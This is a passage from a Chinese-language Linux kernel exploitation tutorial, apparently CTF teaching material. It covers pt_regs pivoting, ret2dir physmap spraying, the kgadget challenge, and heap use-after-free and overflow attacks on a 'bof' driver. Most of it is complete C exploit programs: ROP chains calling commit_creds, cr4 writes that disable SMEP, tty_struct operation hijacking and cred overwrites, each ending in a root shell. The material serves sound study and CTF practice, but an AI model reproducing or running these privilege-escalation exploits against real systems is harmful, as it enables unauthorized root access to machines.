    set_off(64);
    char buf[64];
    coore_read(buf);
    return *(size_t *) buf;
}

int main() {
    rebase();

    core_fd = open("/proc/core", O_RDWR);
    if (core_fd < 0) {
        puts("[-] Failed to open core.");
        exit(-1);
    }

    size_t canary = get_canary();
    printf("[*] canary: %p\n", canary);

    char buf[0x100];
    memset(buf, 'a', sizeof(buf));
    *(size_t *) &buf[64] = canary;
    *(size_t *) &buf[80] = add_rsp_0xe8_ret;

    core_write(buf, sizeof(buf));
    __asm__(
            "mov r15, pop_rdi_ret;"
            "mov r14, init_cred;"
            "mov r13, commit_creds;"
            "mov r12, swapgs_restore_regs_and_return_to_usermode;"
            "mov rbp, 0x5555555555555555;"
            "mov rbx, 0x6666666666666666;"
            "mov r11, 0x7777777777777777;"
            "mov r10, 0x8888888888888888;"
            "mov r9, 0x9999999999999999;"
            "mov r8, 0xaaaaaaaaaaaaaaaa;"
            "mov rax, 16;"
            "mov rdx, 0xffffffffffff0058;"
            "mov rsi, 0x6677889A;"
            "mov rdi, core_fd;"
            "syscall"
            );

    system("/bin/sh");

    return 0;
}

ret2dir

如果 pt_regs 所在的内存被修改，导致最多只能控制 16 字节的内存，我们可以利用 ret2dir 的利用方式将栈迁移至内核的线性映射区。

ret2dir 是哥伦比亚大学网络安全实验室在 2014 年提出的一种辅助攻击手法，主要用来绕过 smep、smap、pxn 等用户空间与内核空间隔离的防护手段，原论文见此处：http://www.cs.columbia.edu/~vpk/papers/ret2dir.sec14.pdf 。
Linux 系统中有一部分物理内存会同时被映射到用户空间和内核空间。内核空间中的这块区域叫做 direct mapping area，即内核的线性映射区，这个区域映射了所有的物理内存。

ffff888000000000 | -119.5 TB | ffffc87fffffffff | 64 TB | direct mapping of all physical memory (page_offset_base)

下图便是原论文中对 ret2dir 这种攻击的示例，我们在用户空间中布置的 gadget 可以通过 direct mapping area 上的地址在内核空间中访问到

但需要注意的是在新版的内核当中 direct mapping area 已经不再具有可执行权限，因此我们很难再在用户空间直接布置 shellcode 进行利用，但我们仍能通过在用户空间布置 ROP 链的方式完成利用

比较朴素的一种使用 ret2dir 进行攻击的手法便是：

利用 mmap 在用户空间大量喷射内存
利用漏洞泄露出内核的“堆”上地址（通过 kmalloc 获取到的地址），这个地址直接来自于线性映射区
利用泄露出的内核线性映射区的地址进行内存搜索，从而找到我们在用户空间喷射的内存
此时我们就获得了一个映射到用户空间的内核空间地址，我们通过这个内核空间地址便能直接访问到用户空间的数据，从而避开了传统的隔绝用户空间与内核空间的防护手段

需要注意的是我们往往没有内存搜索的机会，因此需要使用 mmap 喷射大量的物理内存写入同样的 payload，之后再随机挑选一个线性映射区上的地址进行利用，这样我们就有很大的概率命中到我们布置的 payload 上，这种攻击手法也称为 physmap spray 。

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/mman.h>

/*
linux kernel 4.15.8
/Documentation/x86/x86_64/mm.txt
ffff880000000000 - ffffc7ffffffffff (=64 TB) direct mapping of all phys. memory
*/
size_t try_hit = 0xffff880000000000 + 0x7000000;
size_t prepare_kernel_cred = 0xFFFFFFFF8109CCE0;
size_t commit_creds = 0xFFFFFFFF8109C8E0;
size_t init_cred = 0xFFFFFFFF8223D1A0;
size_t pop_rdi_ret = 0xffffffff81000b2f;
size_t pop_rsp_ret = 0xffffffff81001689;
size_t add_rsp_0xe8_ret = 0xffffffff816bb966;
size_t ret = 0xFFFFFFFF8100168A;
size_t swapgs_restore_regs_and_return_to_usermode = 0xFFFFFFFF81A008DA;
size_t user_cs, user_rflags, user_sp, user_ss;

void save_status() {
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;");
    puts("[*] status has been saved.");
}

void get_shell() { system("/bin/sh"); }

int core_fd;

void coore_read(char *buf) {
    ioctl(core_fd, 0x6677889B, buf);
}

void set_off(size_t off) {
    ioctl(core_fd, 0x6677889C, off);
}

void core_write(char *buf, size_t len) {
    write(core_fd, buf, len);
}

/*
 * Reads /tmp/kallsyms, finds the first commit_creds or prepare_kernel_cred
 * entry, and shifts every hard-coded kernel address by the difference between
 * the listed address and the hard-coded one.
 *
 * Exits with status -1 when the file cannot be opened. When neither symbol is
 * listed, the hard-coded addresses are left unchanged.
 */
void rebase() {
    FILE *kallsyms_fd = fopen("/tmp/kallsyms", "r");
    /* fopen() signals failure with NULL, never with a negative value. */
    if (kallsyms_fd == NULL) {
        puts("[-] Failed to open kallsyms.\n");
        exit(-1);
    }
    char line[0x100], name[0x50], type[0x10];
    size_t addr;
    /* Parse line by line: the loop ends at EOF (a bare fscanf() condition is
     * true for EOF) and malformed lines are skipped. */
    while (fgets(line, sizeof(line), kallsyms_fd) != NULL) {
        if (sscanf(line, "%zx %15s %79s", &addr, type, name) != 3) {
            continue;
        }
        size_t offset;
        if (!strcmp(name, "commit_creds")) {
            offset = addr - commit_creds;
        } else if (!strcmp(name, "prepare_kernel_cred")) {
            offset = addr - prepare_kernel_cred;
        } else {
            continue;
        }
        printf("[*] offset: 0x%zx\n", offset);
        commit_creds += offset;
        prepare_kernel_cred += offset;
        init_cred += offset;
        pop_rdi_ret += offset;
        add_rsp_0xe8_ret += offset;
        pop_rsp_ret += offset;
        ret += offset;
        swapgs_restore_regs_and_return_to_usermode += offset;
        break;
    }
    fclose(kallsyms_fd);
    printf("[*] commit_creds: 0x%zx\n", commit_creds);
    printf("[*] prepare_kernel_cred: 0x%zx\n", prepare_kernel_cred);
}

size_t get_canary() {
    set_off(64);
    char buf[64];
    coore_read(buf);
    return *(size_t *) buf;
}

/*
 * Builds one template page (a run of `ret` entries followed by the 11-entry
 * chain) and copies it into 29999 freshly mapped anonymous pages.
 *
 * Exits with status -1 when the template page cannot be mapped; stops early
 * when a later mapping fails.
 */
void physmap_spray() {
    size_t page_size = sysconf(_SC_PAGESIZE);
    size_t *rop = mmap(NULL, page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    /* mmap() reports failure with MAP_FAILED; writing through it would fault. */
    if (rop == MAP_FAILED) {
        perror("mmap");
        exit(-1);
    }
    /* Unsigned index: the bound below is a size_t expression. */
    size_t it = 0;
    for (; it < (page_size / 8 - 11); it++) {
        rop[it] = ret;
    }
    rop[it++] = pop_rdi_ret;
    rop[it++] = init_cred;
    rop[it++] = commit_creds;
    rop[it++] = swapgs_restore_regs_and_return_to_usermode + 0x16;
    rop[it++] = 0;
    rop[it++] = 0;
    rop[it++] = (size_t) get_shell;
    rop[it++] = user_cs;
    rop[it++] = user_rflags;
    rop[it++] = user_sp;
    rop[it++] = user_ss;
    puts("[*] Spraying physmap...");
    for (int i = 1; i < 30000; i++) {
        void *page = mmap(NULL, page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (page == MAP_FAILED) {
            /* Out of address space or memory: keep what was mapped so far. */
            perror("mmap");
            break;
        }
        memcpy(page, rop, page_size);
    }
}

int main() {
    rebase();
    save_status();
    physmap_spray();

    core_fd = open("/proc/core", O_RDWR);
    if (core_fd < 0) {
        puts("[-] Failed to open core.");
        exit(-1);
    }

    size_t canary = get_canary();
    printf("[*] canary: %p\n", canary);

    char buf[0x100];
    memset(buf, 'a', sizeof(buf));
    *(size_t *) &buf[64] = canary;
    *(size_t *) &buf[80] = add_rsp_0xe8_ret;

    core_write(buf, sizeof(buf));

    __asm__(
            "mov r15, pop_rsp_ret;"
            "mov r14, try_hit;"
            "mov r13, 0x3333333333333333;"
            "mov r12, 0x4444444444444444;"
            "mov rbp, 0x5555555555555555;"
            "mov rbx, 0x6666666666666666;"
            "mov r11, 0x7777777777777777;"
            "mov r10, 0x8888888888888888;"
            "mov r9, 0x9999999999999999;"
            "mov r8, 0xaaaaaaaaaaaaaaaa;"
            "mov rcx, 0xbbbbbbbbbbbbbbbb;"
            "mov rax, 16;"
            "mov rdx, 0xffffffffffff0058;"
            "mov rsi, 0x6677889A;"
            "mov rdi, core_fd;"
            "syscall;"
            );

    system("/bin/sh");

    return 0;
}

例题：MINI-LCTF2022 - kgadget

附件下载链接
主要漏洞点在 kgadget_ioctl 函数上。分析如下：

总之这个函数可以执行指定位置的代码。
不过根据它输出的提示信息， pt_regs 中只有 r8 和 r9 寄存器可以使用，但是除去这两个寄存器以及系统调用和传参用掉的寄存器，还有 r11 和 rcx 的值没有被覆盖。

为了探究原因，首先在系统调用前将寄存器赋值为特殊值。

然后在 entry_SYSCALL_64 函数处下一个条件断点。

运行测试程序成功断在了目标位置。

观察寄存器发现 rcx 和 r11 已经被写入其他值了。因此这两个寄存器实际上是无法利用的。

漏洞利用的手段比较巧妙。
首先在用户空间喷射大量下图所示的内存页。

由于栈迁移的 gadget 占了绝大多数，因此 ioctl 执行随便一个地址的 gadget 很大概率会将栈迁移到 pt_regs 结构体。
在 pt_regs 结构体中利用 r8 和 r9 两个寄存器将栈迁移到喷射内存的区域的某个地址，很大概率会迁移到 add rsp; ret; 和 ret; gadget 处，很大概率会最终执行到 rop 完成提权。

返回用户空间在使用 swapgs_restore_regs_and_return_to_usermode 函数时应该注意，前面 pop 完寄存器之后除 iretq 需要的寄存器还剩 orig_rax 和 rdi ，为了缩短 rop 的长度，可以直接 retn 到标记的位置，不过 rop 接下来还要有 16 字节的填充来表示 orig_rax 和 rdi 的位置。

exp 如下：

#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>

const size_t try_hit = 0xffff888000000000 + 0x7000000;
size_t user_cs, user_rflags, user_sp, user_ss;
size_t page_size;
int dev_fd;

void save_status() {
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;"
    );
    puts("[*]status has been saved.");
}

void get_shell() { system("/bin/sh"); }

/*
 * Entry point of the kgadget exploit.
 *
 * Steps, in order:
 *   1. save the user-mode context and open /dev/kgadget;
 *   2. build one template page: stack-lifting gadgets first, then `ret`
 *      gadgets, then an 11-slot chain (pop rdi / init_cred / commit_creds /
 *      return-to-usermode trampoline / iret frame ending in get_shell);
 *   3. copy that template into many anonymous pages;
 *   4. load the registers with chosen values and issue syscall 0x10 on dev_fd.
 *
 * Returns -1 when the device cannot be opened or a mapping fails (the
 * original fell through and would crash later), 0 otherwise.
 */
int main() {
    save_status();
    dev_fd = open("/dev/kgadget", O_RDWR);
    if (dev_fd < 0) {
        puts("[-] Error: open kgadget");
        return -1; /* nothing below can work without the device */
    }
    page_size = sysconf(_SC_PAGESIZE);
    size_t *rop = mmap(NULL, page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (rop == MAP_FAILED) {
        puts("[-] Error: mmap template page");
        return -1;
    }
    int idx = 0;
    while (idx < (page_size / 8 - 0x30)) {
        rop[idx++] = 0xffffffff810737fe;// add rsp, 0xa0; pop rbx; pop r12; pop r13; pop rbp; ret;
    }
    for (; idx < (page_size / 8 - 11); idx++) {
        rop[idx] = 0xffffffff8108c6f1;// ret;
    }
    /* The last 11 slots of the page hold the actual chain. */
    rop[idx++] = 0xffffffff8108c6f0;// pop rdi; ret;
    rop[idx++] = 0xffffffff82a6b700;// init_cred
    rop[idx++] = 0xffffffff810c92e0;// commit_creds
    rop[idx++] = 0xffffffff81c00fb0 + 27;// swapgs_restore_regs_and_return_to_usermode + 27;
    rop[idx++] = 0x0000000000000000;// padding
    rop[idx++] = 0x0000000000000000;// padding
    rop[idx++] = (size_t) get_shell;
    rop[idx++] = user_cs;
    rop[idx++] = user_rflags;
    rop[idx++] = user_sp;
    rop[idx++] = user_ss;
    puts("[*] Spraying physmap...");
    for (int i = 1; i < 15000; i++) {
        /* Plain byte pages: the original typed this as sigset_t *, which has nothing to do with signals. */
        void *page = mmap(NULL, page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (page == MAP_FAILED) {
            puts("[-] Error: mmap spray page");
            return -1;
        }
        memcpy(page, rop, page_size);
    }
    puts("[*] trigger physmap one_gadget...");
    __asm__(
    "mov r15,   0xbeefdead;"
    "mov r14,   0x11111111;"
    "mov r13,   0x22222222;"
    "mov r12,   0x33333333;"
    "mov rbp,   0x44444444;"
    "mov rbx,   0x55555555;"
    "mov r11,   0x66666666;"
    "mov r10,   0x77777777;"
    "mov r9,    0xffffffff811483d0;"// pop rsp; ret;
    "mov r8,    try_hit;"
    "mov rax,   0x10;"
    "mov rcx,   0xaaaaaaaa;"
    "mov rdx,   try_hit;"
    "mov rsi,   0x1bf52;"
    "mov rdi,   dev_fd;"
    "syscall"
    );
    return 0;
}

Kernel Heap Exploit

这里以例题 heap bof 为例进行讲解。

heap bof 源码如下，存在 uaf 和堆溢出两种漏洞。

/* Request block that bof_ioctl() copies in from the user pointer passed as the ioctl argument. */
struct param {
    size_t len;       // length of the data
    char *buf;        // user-space buffer address
    unsigned long idx;// index into the ptr array
};

/*
 * ioctl handler of the example driver. Copies a struct param from user space
 * and dispatches on cmd:
 *   9 - copy p_arg.len bytes from ptr[idx] to the user buffer;
 *   8 - copy p_arg.len bytes from the user buffer into ptr[idx];
 *   7 - kfree(ptr[idx]);
 *   5 - ptr[idx] = kmalloc(p_arg.len).
 * Returns 0 for these commands and -1 for any other cmd.
 *
 * As written, no return value of copy_from_user/copy_to_user is checked and
 * neither idx nor len is validated against the array or the allocation size.
 */
long bof_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) {
    struct param p_arg;
    copy_from_user(&p_arg, (void *) arg, sizeof(struct param));
    long retval = 0;
    switch (cmd) {
        case 9:
            /* read: len comes from the caller, not from the allocation */
            copy_to_user(p_arg.buf, ptr[p_arg.idx], p_arg.len);
            printk("copy_to_user: 0x%lx\n", *(long *) ptr[p_arg.idx]);
            break;
        case 8:
            /* write: len is again caller-controlled, so it can exceed the object */
            copy_from_user(ptr[p_arg.idx], p_arg.buf, p_arg.len);
            break;
        case 7:
            /* free: ptr[idx] keeps the stale pointer afterwards (it is even printed below) */
            kfree(ptr[p_arg.idx]);
            printk("free: 0x%p\n", ptr[p_arg.idx]);
            break;
        case 5:
            /* alloc: the requested size is taken verbatim from the caller */
            ptr[p_arg.idx] = kmalloc(p_arg.len, GFP_KERNEL);
            printk("alloc: 0x%p, size: %2lx\n", ptr[p_arg.idx], p_arg.len);
            break;
        default:
            retval = -1;
            break;
    }
    return retval;
}

Use After Free

修改 cred

cred 结构体大小为 0xa8 ，根据 slub 分配机制，如果申请和释放大小为 0xa8（实际为 0xc0 ，即 kmalloc-192）的内存块，此时再 fork 一个子进程，则该子进程的 cred 结构体正是刚才释放掉的内存块。利用 UAF 漏洞修改 cred 就可以实现提权。

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <sys/wait.h>

/* User-space copy of the request block passed to the bof driver's ioctl. */
struct param {
    size_t len;       // length of the data
    char *buf;        // user-space buffer address
    unsigned long idx;// index into the ptr array
};

/*
 * Allocate and free one 0xa8-byte object through the driver, fork, and have
 * the child write 0x30 zero bytes through the stale driver pointer. The child
 * then checks getuid() and starts a shell on success.
 *
 * Returns -1 if the device cannot be opened or fork fails, 0 otherwise.
 */
int main() {
    /* Absolute path, as used by the other programs for this driver; the
     * original relative "dev/bof" only worked when the cwd was "/". */
    int fd = open("/dev/bof", O_RDWR);
    if (fd < 0) {
        puts("[-]open bof device failed");
        return -1;
    }
    struct param p = {0xa8, malloc(0xa8), 1};
    ioctl(fd, 5, &p);//malloc
    ioctl(fd, 7, &p);//free
    int pid = fork();
    if (pid < 0) {
        puts("[-]fork error");
        return -1;
    }
    if (pid == 0) {
        /* child: overwrite the first 0x30 bytes of the freed object with zeros */
        p.buf = malloc(p.len = 0x30);
        memset(p.buf, 0, p.len);
        ioctl(fd, 8, &p);//edit
        if (getuid() == 0) {
            puts("[+]root success");
            system("/bin/sh");
        } else {
            puts("[-]root failed");
        }
    } else {
        wait(NULL);
    }
    close(fd);
    return 0;
}

但是此种方法在较新版本 kernel 中已不可行，我们已无法直接分配到 cred_jar 中的 object，这是因为 cred_jar 在创建时设置了 SLAB_ACCOUNT 标记，在 CONFIG_MEMCG_KMEM=y 时（默认开启）cred_jar 不会再与相同大小的 kmalloc-192 进行合并

来自内核源码 4.5 kernel/cred.c

/* Quoted cred_init(): the cred_jar cache is created with SLAB_ACCOUNT among its flags. */
void __init cred_init(void)
{
	/* allocate a slab in which we can store credentials */
	cred_jar = kmem_cache_create("cred_jar", sizeof(struct cred), 0,
			SLAB_HWCACHE_ALIGN|SLAB_PANIC|SLAB_ACCOUNT, NULL);
}

本题（4.4.72）：

/* Quoted cred_init(): here the cred_jar cache is created without the SLAB_ACCOUNT flag. */
void __init cred_init(void)
{
	/* allocate a slab in which we can store credentials */
	cred_jar = kmem_cache_create("cred_jar", sizeof(struct cred),
				     0, SLAB_HWCACHE_ALIGN|SLAB_PANIC, NULL);
}

利用 tty_struct 劫持程序控制流提权

在 /dev 下有一个伪终端设备 ptmx ，在我们打开这个设备时内核中会创建一个 tty_struct 结构体，与其他类型设备相同，tty 驱动设备中同样存在着一个存放着函数指针的结构体 tty_operations 。

使用 tty 设备的前提是挂载了 ptmx 设备。

1
2
3

mkdir /dev/pts
mount -t devpts none /dev/pts
chmod 777 /dev/ptmx

tty 的结构体 tty_struct 定义在 linux/tty.h 中。其中 ops 项（64bit 下位于结构体偏移 0x18 处）指向一个存放 tty 相关操作函数的函数指针的结构体 tty_operations 。

/* Abridged excerpt ("..." marks omitted members): only the ioctl callback is shown. */
struct tty_operations {
    ...
	int  (*ioctl)(struct tty_struct *tty,
		    unsigned int cmd, unsigned long arg);
    ...
};

/* Abridged excerpt ("..." marks omitted members): only the pointer to the operations table is shown. */
struct tty_struct {
    ...
	const struct tty_operations *ops;
	...
}

因此我们只需要像上一种方法那样利用 UAF 修改 tty_struct 的结构体指针 ops （这里不直接劫持 tty_operations 的原因是 tty_operations 已经实例化的，不是动态申请的，类似 glibc 中的 _IO_XX_jumps ）然后再调用 tty 的相关操作函数就可以劫持控制流，实现我们想要的操作。
然而如果仅仅是靠修改 tty_operations 结构体中某函数指针只能写入一个 gadget ，除了使用 pt_regs + ret2dir 外还有下面这种方法。

这里需要利用通过 tty_struct 执行 ioctl 时的特性。

首先由于 tty_struct 指向的 tty_operations 已经实例化，因此可以通过 tty_struct 的 tty_operations 泄露内核基址。

通过 tty_struct 执行 ioctl 时， rax 的值正好是 rip 的值，也就是 tty_operations 中 ioctl 函数指针指向的指令的地址。

如果向 ioctl 函数指针写入 xchg eax,esp;ret 指令地址，则会将 rsp 的值置为 rax & 0xffffffff ，即将栈迁移至 rax & 0xffffffff 地址处。如果我们提前在 rax & 0xffffffff 地址处布置好 rop 则可以完成提权操作。

这里需要注意的是：

mmap 的内存不应该从 rax & 0xffffffff 开始，因为在执行 rop 时返回到用户空间执行 get_root 函数，函数内的压栈操作会使 rsp 小于 rax & 0xffffffff ，访问到未映射的内存造成越界，因此映射的起始地址需要向低地址方向留出一段偏移。
1
void *mmap_addr = mmap(mmap_base - 0x1000, 0x30000, 7, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
mmap 的内存是没有映射到实际物理内存的虚拟内存，如果 rsp 到达没有写入 rop 的位置同样也会导致越界错误，因此在使用前先写入数据使其映射到物理内存上。
1
memset(mmap_addr, 0, 0x30000);
由于 ROP 在用户空间，因此无法绕过 SMAP 保护。

#include <stdio.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/ioctl.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Kernel gadget addresses, named after the instructions they are expected to contain.
 * main() adds the leaked load offset to each of them before use. */
size_t pop_rdi_ret = 0xffffffff8135ce9d;
size_t mov_cr4_rdi_pop_rbp_ret = 0xffffffff81004c10;
size_t swapgs_pop_rbp_ret = 0xffffffff810601f4;
size_t iretq = 0xffffffff810463cc;
size_t xchg_eax_esp_ret = 0xffffffff8100008a;

/*
 * User-space declaration of the tty operations table; main() allocates one,
 * zeroes it and fills in the ioctl and close slots.
 * NOTE(review): the member order must match the target kernel's
 * struct tty_operations for those slots to line up -- confirm per version.
 */
struct tty_operations {
    struct tty_struct *(*lookup)(struct tty_driver *driver, struct file *filp, int idx);

    int (*install)(struct tty_driver *driver, struct tty_struct *tty);

    void (*remove)(struct tty_driver *driver, struct tty_struct *tty);

    int (*open)(struct tty_struct *tty, struct file *filp);

    void (*close)(struct tty_struct *tty, struct file *filp);

    void (*shutdown)(struct tty_struct *tty);

    void (*cleanup)(struct tty_struct *tty);

    int (*write)(struct tty_struct *tty, const unsigned char *buf, int count);

    int (*put_char)(struct tty_struct *tty, unsigned char ch);

    void (*flush_chars)(struct tty_struct *tty);

    int (*write_room)(struct tty_struct *tty);

    int (*chars_in_buffer)(struct tty_struct *tty);

    int (*ioctl)(struct tty_struct *tty, unsigned int cmd, unsigned long arg);

    long (*compat_ioctl)(struct tty_struct *tty, unsigned int cmd, unsigned long arg);

    void (*set_termios)(struct tty_struct *tty, struct ktermios *old);

    void (*throttle)(struct tty_struct *tty);

    void (*unthrottle)(struct tty_struct *tty);

    void (*stop)(struct tty_struct *tty);

    void (*start)(struct tty_struct *tty);

    void (*hangup)(struct tty_struct *tty);

    int (*break_ctl)(struct tty_struct *tty, int state);

    void (*flush_buffer)(struct tty_struct *tty);

    void (*set_ldisc)(struct tty_struct *tty);

    void (*wait_until_sent)(struct tty_struct *tty, int timeout);

    void (*send_xchar)(struct tty_struct *tty, char ch);

    int (*tiocmget)(struct tty_struct *tty);

    int (*tiocmset)(struct tty_struct *tty, unsigned int set, unsigned int clear);

    int (*resize)(struct tty_struct *tty, struct winsize *ws);

    int (*set_termiox)(struct tty_struct *tty, struct termiox *tnew);

    int (*get_icount)(struct tty_struct *tty, struct serial_icounter_struct *icount);

    const struct file_operations *proc_fops;
};

/* Request block passed to the bof driver's ioctl. idx is signed here so that
 * main()'s countdown loops (idx >= 0) can terminate. */
struct param {
    size_t len;    /* number of bytes to allocate or copy */
    char *buf;     /* user-space buffer */
    long long idx; /* slot in the driver's ptr array */
};
/* Calling-convention attribute applied to the kernel function pointers below.
 * NOTE(review): regparm is an i386 attribute; presumably a no-op on x86-64 -- confirm. */
#define KERNCALL __attribute__((regparm(3)))

/* Pre-offset address of prepare_kernel_cred; main() adds the leaked offset. */
void *(*prepare_kernel_cred)(void *)KERNCALL =(void *) 0xffffffff8109f2b0;

/* Pre-offset address of commit_creds; main() adds the leaked offset. */
void *(*commit_creds)(void *)KERNCALL =(void *) 0xffffffff8109ef00;

/* Start /bin/sh through system(); its address is the return target placed after iretq in the ROP chain. */
void get_shell() {
    system("/bin/sh");
}

/* Call prepare_kernel_cred(0) and hand the result to commit_creds(); its address is placed in the ROP chain by main(). */
void get_root() {
    void *new_cred = prepare_kernel_cred(0);
    commit_creds(new_cred);
}

size_t user_cs, user_rflags, user_sp, user_ss;

/*
 * Capture the current cs, ss, rsp and rflags into user_cs, user_ss, user_sp
 * and user_rflags, then print a confirmation line.
 * NOTE(review): destination-first operands, so this presumably requires
 * Intel-syntax inline asm (e.g. gcc -masm=intel) -- confirm.
 */
void save_status() {
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"             /* rflags goes through the stack */
            "pop user_rflags;"
            );
    puts("[*] status has been saved.");
}

#define __USE_GNU

#include <sched.h>

/*
 * Set the CPU affinity of the current process to exactly one CPU.
 *
 * core: index of the CPU to run on.
 * The result of sched_setaffinity() is not checked.
 */
void bind_cpu(int core) {
    cpu_set_t only_core;
    const pid_t self = getpid();

    CPU_ZERO(&only_core);
    CPU_SET(core, &only_core);
    sched_setaffinity(self, sizeof(only_core), &only_core);
}

/* Number of driver slots main() allocates, frees and later overwrites. */
const int BOF_NUM = 40;
/* Number of /dev/ptmx descriptors main() opens. */
const int PTMX_NUM = 0x100;

/*
 * Entry point of the tty_struct exploit for the bof driver.
 *
 * Steps, in order: pin to the current CPU; allocate and free BOF_NUM objects
 * of 0x2e0 bytes through the driver; open PTMX_NUM /dev/ptmx descriptors;
 * read slot 0 back and derive the kernel offset from the pointer at +0x18;
 * build a fake tty_operations and a ROP chain; map memory around
 * (xchg_eax_esp_ret & 0xffffffff) and copy the chain there; overwrite the
 * pointer at +0x18 in every slot; finally call ioctl() and close() on every
 * ptmx descriptor.
 *
 * Returns -1 if the device cannot be opened or the chain cannot be placed,
 * 0 otherwise.
 */
int main() {
    bind_cpu(sched_getcpu());

    int bof_fd = open("/dev/bof", O_RDWR);
    if (bof_fd == -1) {
        puts("[-] open bof device failed!");
        return -1;
    }

    struct param p;
    p.buf = malloc(p.len = 0x2e0);

    // Have the driver allocate BOF_NUM chunks of 0x2e0 bytes.
    for (p.idx = BOF_NUM - 1; p.idx >= 0; p.idx--) {
        ioctl(bof_fd, 5, &p); // malloc
    }

    // Free all BOF_NUM chunks again.
    for (p.idx = BOF_NUM - 1; p.idx >= 0; p.idx--) {
        ioctl(bof_fd, 7, &p);  // free
    }

    // Open /dev/ptmx many times to spray tty_struct objects.
    int ptmx_fds[PTMX_NUM];
    for (int i = 0; i < PTMX_NUM; ++i) {
        ptmx_fds[i] = open("/dev/ptmx", O_RDWR | O_NOCTTY);
        if (ptmx_fds[i] == -1) {
            puts("[-] open ptmx err");
        }
    }

    p.idx = 0;
    ioctl(bof_fd, 9, &p);
    // If the freed chunk is now a tty_struct, it should start with the bytes
    // 1 54  0  0  1  0  0  0  0  0  0  0  0  0  0  0
    for (int i = 0; i < 16; ++i) {
        // Cast to unsigned char: a plain (signed) char >= 0x80 would be
        // sign-extended and printed as ffffffXX.
        printf("%2x%c", (unsigned char) p.buf[i], i == 15 ? '\n' : ' ');
    }

    // Derive the kernel offset from the leaked tty_operations pointer.
    size_t offset = (*(size_t *) &p.buf[0x18]) - 0xffffffff81a87940;
    printf("[*] offset: %#zx\n", offset); // %p with a size_t argument is undefined
    commit_creds = (void *) ((size_t) commit_creds + offset);
    prepare_kernel_cred = (void *) ((size_t) prepare_kernel_cred + offset);
    pop_rdi_ret += offset;
    mov_cr4_rdi_pop_rbp_ret += offset;
    swapgs_pop_rbp_ret += offset;
    iretq += offset;
    xchg_eax_esp_ret += offset;

    // Build the fake tty_operations table.
    struct tty_operations *fake_tty_operations = (struct tty_operations *) malloc(sizeof(struct tty_operations));
    memset(fake_tty_operations, 0, sizeof(struct tty_operations));
    fake_tty_operations->ioctl = (void *) xchg_eax_esp_ret;
    fake_tty_operations->close = (void *) xchg_eax_esp_ret;

    // Lay out the ROP chain.
    save_status();
    size_t rop_chain[] = {
            pop_rdi_ret,
            0x6f0,
            mov_cr4_rdi_pop_rbp_ret,
            0,
            (size_t) get_root,
            swapgs_pop_rbp_ret,
            0,//padding
            iretq,
            (size_t) get_shell,
            user_cs,
            user_rflags,
            user_sp,
            user_ss
    };

    // Copy the ROP chain to mmap_base before triggering.
    void *mmap_base = (void *) (xchg_eax_esp_ret & 0xffffffff);
    void *mmap_addr = mmap((char *) mmap_base - 0x1000, 0x30000, 7, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    printf("[*] mmap_addr: %p\n", mmap_addr);
    // The address is only a hint (no MAP_FIXED): make sure the mapping really
    // covers the chain before writing to mmap_base.
    if (mmap_addr == MAP_FAILED
        || (char *) mmap_base < (char *) mmap_addr
        || (char *) mmap_base + sizeof(rop_chain) > (char *) mmap_addr + 0x30000) {
        puts("[-] mmap did not cover the rop chain address");
        return -1;
    }
    memset(mmap_addr, 0, 0x30000); // touch every page so it is backed by memory
    memcpy(mmap_base, rop_chain, sizeof(rop_chain));

    // Overwrite the ops pointer in every slot.
    *(size_t *) &p.buf[0x18] = (size_t) fake_tty_operations;
    for (p.idx = 0; p.idx < BOF_NUM; p.idx++) {
        ioctl(bof_fd, 8, &p);
    }

    // Invoke tty_operations.ioctl and tty_operations.close to trigger.
    for (int i = 0; i < PTMX_NUM; ++i) {
        ioctl(ptmx_fds[i], 0, 0);
        close(ptmx_fds[i]);
    }

    return 0;
}

Heap Overflow

修改 cred

溢出修改 cred ，和前面 UAF 修改 cred 一样，在新版本失效。

#include <stdio.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#include <sys/wait.h>

/* Request block passed to the bof driver's ioctl. */
struct param {
    size_t len;    // length of the data
    char *buf;     // user-space buffer address
    long long idx; // index into the ptr array
};

const int BOF_NUM = 10;

/*
 * Entry point of the heap-overflow variant: allocate driver objects of 0xa8
 * bytes, free slot 5, fork, then write 0xc0 + 0x30 zero bytes through slot 4.
 * The child checks getuid() and starts a shell when it is 0; the parent waits.
 *
 * Exits with -1 if the device cannot be opened, fork fails, or the buffer
 * cannot be allocated; returns 0 otherwise.
 */
int main(void) {
    int bof_fd = open("/dev/bof", O_RDWR);
    if (bof_fd == -1) {
        puts("[-] Failed to open bof device.");
        exit(-1);
    }

    struct param p = {0xa8, malloc(0xa8), 0};
    // Have the driver allocate 80 chunks of 0xa8 bytes.
    for (int i = 0; i < 80; i++) {
        ioctl(bof_fd, 5, &p);  // malloc
    }
    puts("[*] clear heap done");

    // Have the driver allocate 10 more chunks of 0xa8 bytes.
    for (p.idx = 0; p.idx < BOF_NUM; p.idx++) {
        ioctl(bof_fd, 5, &p);  // malloc
    }
    p.idx = 5;
    ioctl(bof_fd, 7, &p); // free

    // fork() allocates a cred structure.
    int pid = fork();
    if (pid < 0) {
        puts("[-] fork error");
        exit(-1);
    }

    // ptr[4] is now expected to be adjacent to the cred;
